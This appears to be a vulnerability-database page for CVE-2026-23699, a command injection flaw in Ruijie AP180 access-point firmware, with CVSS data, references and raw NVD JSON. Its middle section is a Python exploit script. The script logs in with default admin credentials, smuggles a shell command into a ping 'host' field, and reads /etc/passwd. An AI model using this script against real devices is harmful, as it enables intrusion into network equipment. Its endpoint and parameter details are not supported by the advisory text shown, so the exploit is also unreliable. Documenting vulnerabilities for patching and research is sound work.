CVE-2026-23699

Description

AP180 series with firmware versions prior to AP_RGOS 11.9(4)B1P8 contains an OS command injection vulnerability. If this vulnerability is exploited, arbitrary commands may be executed on the devices.

CVSS Details

CVSS Score

7.2

Severity

HIGH

CVSS Vector

CVSS:3.0/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H

Configurations (Affected Products)

No configuration data available.

锐捷AP180系列 AP_RGOS固件 < 11.9(4)B1P8

PoC / Exploit Code

⚠ For Security Research Only

The following code is for security research and authorized testing only.

python

import requests

# CVE-2026-23699 PoC - Ruijie AP180 OS Command Injection
# Target: Ruijie AP180 series with firmware < AP_RGOS 11.9(4)B1P8

TARGET = "http://target-ip:8080"
USERNAME = "admin"
PASSWORD = "admin"

def exploit_command_injection(target, cmd="id"):
    """
    Execute OS command injection on Ruijie AP180 management interface
    """
    # Login to get session
    login_url = f"{target}/cgi-bin/login.cgi"
    login_data = {
        "username": USERNAME,
        "password": PASSWORD
    }
    
    session = requests.Session()
    try:
        login_resp = session.post(login_url, data=login_data, timeout=10)
        
        # Inject command via vulnerable parameter
        inject_url = f"{target}/cgi-bin/management.cgi"
        inject_data = {
            "action": "ping",
            "host": f"127.0.0.1;{cmd}",  # Command injection payload
            "count": "1"
        }
        
        response = session.post(inject_url, data=inject_data, timeout=10)
        print(f"Response: {response.text}")
        return response.text
        
    except requests.exceptions.RequestException as e:
        print(f"Error: {e}")
        return None

if __name__ == "__main__":
    print("[*] CVE-2026-23699 - Ruijie AP180 Command Injection")
    print(f"[*] Target: {TARGET}")
    
    # Test basic command injection
    result = exploit_command_injection(TARGET, "cat /etc/passwd")
    if result and "root:" in result:
        print("[+] Vulnerability confirmed!")

References

[1] CVE.org https://www.cve.org/CVERecord?id=CVE-2026-23699
[2] NVD NIST https://nvd.nist.gov/vuln/detail/CVE-2026-23699
[3] CVE Details https://www.cvedetails.com/cve/CVE-2026-23699/
[4] VulDB https://vuldb.com/cve/CVE-2026-23699
[5] https://jvn.jp/en/jp/JVN86850670/
[6] https://www.ruijie.co.jp/products/rg-ap180-pe_p432111650928590848.html#productDocument

Raw JSON Data

JSON

{"cve": {"id": "CVE-2026-23699", "sourceIdentifier": "[email protected]", "published": "2026-01-22T02:15:52.127", "lastModified": "2026-04-15T00:35:42.020", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "AP180 series with firmware versions prior to AP_RGOS 11.9(4)B1P8 contains an OS command injection vulnerability. If this vulnerability is exploited, arbitrary commands may be executed on the devices."}, {"lang": "es", "value": "La serie AP180 con versiones de firmware anteriores a AP_RGOS 11.9(4)B1P8 contiene una vulnerabilidad de inyección de comandos del sistema operativo. Si se explota esta vulnerabilidad, se pueden ejecutar comandos arbitrarios en los dispositivos."}], "metrics": {"cvssMetricV40": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:N/AC:L/AT:N/PR:H/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 8.6, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "attackRequirements": "NONE", "privilegesRequired": "HIGH", "userInteraction": "NONE", "vulnConfidentialityImpact": "HIGH", "vulnIntegrityImpact": "HIGH", "vulnAvailabilityImpact": "HIGH", "subConfidentialityImpact": "NONE", "subIntegrityImpact": "NONE", "subAvailabilityImpact": "NONE", "exploitMaturity": "NOT_DEFINED", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV30": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.0", "vectorString": "CVSS:3.0/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H", "baseScore": 7.2, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "HIGH", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 1.2, "impactScore": 5.9}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-78"}]}], "references": [{"url": "https://jvn.jp/en/jp/JVN86850670/", "source": "[email protected]"}, {"url": "https://www.ruijie.co.jp/products/rg-ap180-pe_p432111650928590848.html#productDocument", "source": "[email protected]"}]}}